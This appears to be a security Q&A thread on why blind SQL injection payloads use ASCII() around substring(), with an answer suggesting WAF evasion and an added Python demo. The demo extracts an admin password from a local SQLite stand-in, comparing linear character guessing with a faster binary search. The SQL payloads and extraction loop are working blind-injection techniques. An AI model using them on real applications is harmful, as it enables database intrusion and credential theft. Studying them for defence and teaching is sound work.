
I mean, I can exploit the vulnerability using a substring function and without using an ASCII function like:

SELECT username FROM users WHERE id = 1 AND (SELECT substring(password,1,1) FROM users WHERE username = 'admin' ) = 'a';

And I can exploit the vulnerability like this:

SELECT username FROM users WHERE id = 1 AND (SELECT ASCII(substring(password,1,1)) FROM users WHERE username = 'admin' ) = '97';

What is the wisdom of using the ascii function?

1 Answer


To be clear, I don't know. This is a guess.

One possible answer: it might fool a Web Application Firewall. WAFs are fragile, stupid things, and usually are looking for regular expressions or even hardcoded strings to block. It's quite common to bypass them by adding extra, pointless content to a payload.

What's more, WAF vendors tend to be slow to fix such holes, so a given WAF bypass might exist for months or years, and become well-known in the security community. At that point, it is likely being used by people who don't know why it's there, and on systems that don't require it - that's just "the example they saw of SQLi" or whatever - and thus gets passed on into even more examples, used in exploit kits, and so on. In other words, it sort of metastasizes and may live on for years or decades, even if the original vulnerability is long gone.

... and then, because it becomes so well known as something that is used when attempting a malicious attack, WAF (and similar product) vendors might start looking for that exact string, and we come full circle.

CBHacking
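Added example, written for this page and not taken from the question or the answer above: a local stand-in for the boolean-based blind injection the question describes, used to compare the two payload styles side by side. Both leak the admin password one character at a time, but the substring-equality form can only ask "is this character X?", so it costs up to one request per candidate character, while the numeric form can ask "is the code >= N?", which allows a binary search of about seven requests per character. The code assumes SQLite as the backend (its unicode(X) stands in for MySQL's ASCII(), substr() for substring()); the users table, its rows and the admin password are constructed here.

```python
"""Blind SQLi oracle comparison: substring equality versus character-code binary search.

Added example; assumes SQLite (unicode() in place of ASCII()) and a constructed
users table.  The oracle returns only whether the injected condition was true,
exactly as a blind injection point does."""
import sqlite3
import string

# Constructed sample data (not from the original page).
ADMIN_PASSWORD = "Pa55w0rd!"
# Candidate characters tried, in this order, by the substring-equality method.
CHARSET = string.ascii_letters + string.digits + string.punctuation


def make_db() -> sqlite3.Connection:
    """Build the vulnerable application's database in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "wonderland"), (2, "admin", ADMIN_PASSWORD)])
    return conn


class BlindOracle:
    """Plays the vulnerable application.  The attacker controls the condition
    appended to the WHERE clause and learns only whether a row came back."""

    def __init__(self, conn: sqlite3.Connection) -> None:
        self.conn = conn
        self.queries = 0          # number of requests the attacker has sent

    def ask(self, condition: str) -> bool:
        self.queries += 1
        sql = f"SELECT username FROM users WHERE id = 1 AND ({condition})"
        return self.conn.execute(sql).fetchone() is not None


def sql_str(s: str) -> str:
    """Quote a string literal for use inside the injected condition."""
    return "'" + s.replace("'", "''") + "'"


def past_end(pos: int) -> str:
    """Condition that becomes true once pos lies beyond the end of the password."""
    return f"(SELECT length(password) FROM users WHERE username = 'admin') < {pos}"


def extract_by_substring(oracle: BlindOracle) -> str:
    """The question's first payload: linear search, one request per candidate."""
    result, pos = "", 1
    while not oracle.ask(past_end(pos)):
        for c in CHARSET:
            cond = (f"(SELECT substr(password, {pos}, 1) FROM users "
                    f"WHERE username = 'admin') = {sql_str(c)}")
            if oracle.ask(cond):
                result += c
                break
        else:
            raise ValueError(f"no candidate matched at position {pos}")
        pos += 1
    return result


def extract_by_ascii(oracle: BlindOracle) -> str:
    """The question's second payload, but with >= instead of =: binary search over
    the printable ASCII range [32, 127), about log2(95) ~ 7 requests per position."""
    result, pos = "", 1
    while not oracle.ask(past_end(pos)):
        low, high = 32, 127               # invariant: low <= code < high
        while high - low > 1:
            mid = (low + high) // 2
            cond = (f"(SELECT unicode(substr(password, {pos}, 1)) FROM users "
                    f"WHERE username = 'admin') >= {mid}")
            if oracle.ask(cond):
                low = mid
            else:
                high = mid
        result += chr(low)
        pos += 1
    return result


def compare() -> dict:
    """Run both extractions against a fresh database; return {name: (value, requests)}."""
    out = {}
    for name, fn in (("substring", extract_by_substring), ("ascii", extract_by_ascii)):
        oracle = BlindOracle(make_db())
        out[name] = (fn(oracle), oracle.queries)
    return out


if __name__ == "__main__":
    for name, (value, cost) in compare().items():
        print(f"{name:9s} -> {value!r} in {cost} requests")
```

Both methods recover the same string, but the request counts differ by roughly an order of magnitude, which matters when every request is a log line and a WAF hit. A second practical difference the example cannot show on SQLite: MySQL's default collations are case-insensitive, so `substring(...) = 'a'` also matches `'A'`, whereas `ASCII()` returns the actual code and removes that ambiguity.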